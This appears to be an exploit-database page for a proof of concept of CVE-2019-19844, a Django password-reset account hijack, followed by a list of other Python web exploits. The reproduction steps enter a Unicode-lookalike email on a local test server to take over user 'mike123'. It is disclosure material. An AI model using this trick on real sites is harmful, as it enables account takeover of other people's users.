Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
Author
"Ryuji Tsutsui"
Platform
python
Release date
2019-12-24
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 | EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47879.zip # django_cve_2019_19844_poc PoC for [CVE-2019-19844](https://www.djangoproject.com/weblog/2019/dec/18/security-releases/) # Requirements - Python 3.7.x - PostgreSQL 9.5 or higher ## Setup 1. Create database(e.g. `django_cve_2019_19844_poc`) 1. Set the database name to the environment variable `DJANGO_DATABASE_NAME`(e.g. `export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc`) 1. Run `pip install -r requirements.txt && ./manage.py migrate --noinput` 1. Create the following user with `shell` command: ```python >>> from django.contrib.auth import get_user_model >>> User = get_user_model() >>> User.objects.create_user('mike123', '[email protected]', 'test123') ``` ## Procedure For Reproducing 1. Run `./manage.py runserver` 1. Open `http://127.0.0.1:8000/accounts/password-reset/` 1. Input `mı[email protected]` (Attacker's email), and click send button 1. Receive email (Check console), and reset password 1. Login as `mike123` user |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-10-23 | "Ajenti 2.1.36 - Remote Code Execution (Authenticated)" | webapps | python | "Ahmet Ümit BAYRAM" |
2020-10-16 | "aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)" | webapps | python | "Ünsal Furkan Harani" |
2020-08-04 | "Pi-hole 4.3.2 - Remote Code Execution (Authenticated)" | webapps | python | "Luis Vacacas" |
2019-12-24 | "Django < 3.0 < 2.2 < 1.11 - Account Hijack" | webapps | python | "Ryuji Tsutsui" |
2019-10-14 | "Ajenti 2.1.31 - Remote Code Execution" | webapps | python | "Jeremy Brown" |
2019-09-30 | "TheSystem 1.0 - Command Injection" | webapps | python | "Sadik Cetin" |
2019-09-30 | "thesystem 1.0 - Cross-Site Scripting" | webapps | python | "Anıl Baran Yelken" |
2019-04-03 | "PhreeBooks ERP 5.2.3 - Remote Command Execution" | remote | python | "Metin Yunus Kandemir" |
2019-02-15 | "Jinja2 2.10 - 'from_string' Server Side Template Injection" | webapps | python | JameelNabbo |
2019-01-07 | "Mailcleaner - Authenticated Remote Code Execution (Metasploit)" | remote | python | "Mehmet Ince" |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2019-12-24 | "Django < 3.0 < 2.2 < 1.11 - Account Hijack" | webapps | python | "Ryuji Tsutsui" |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/47879/?format=json')
For full documentation follow the link above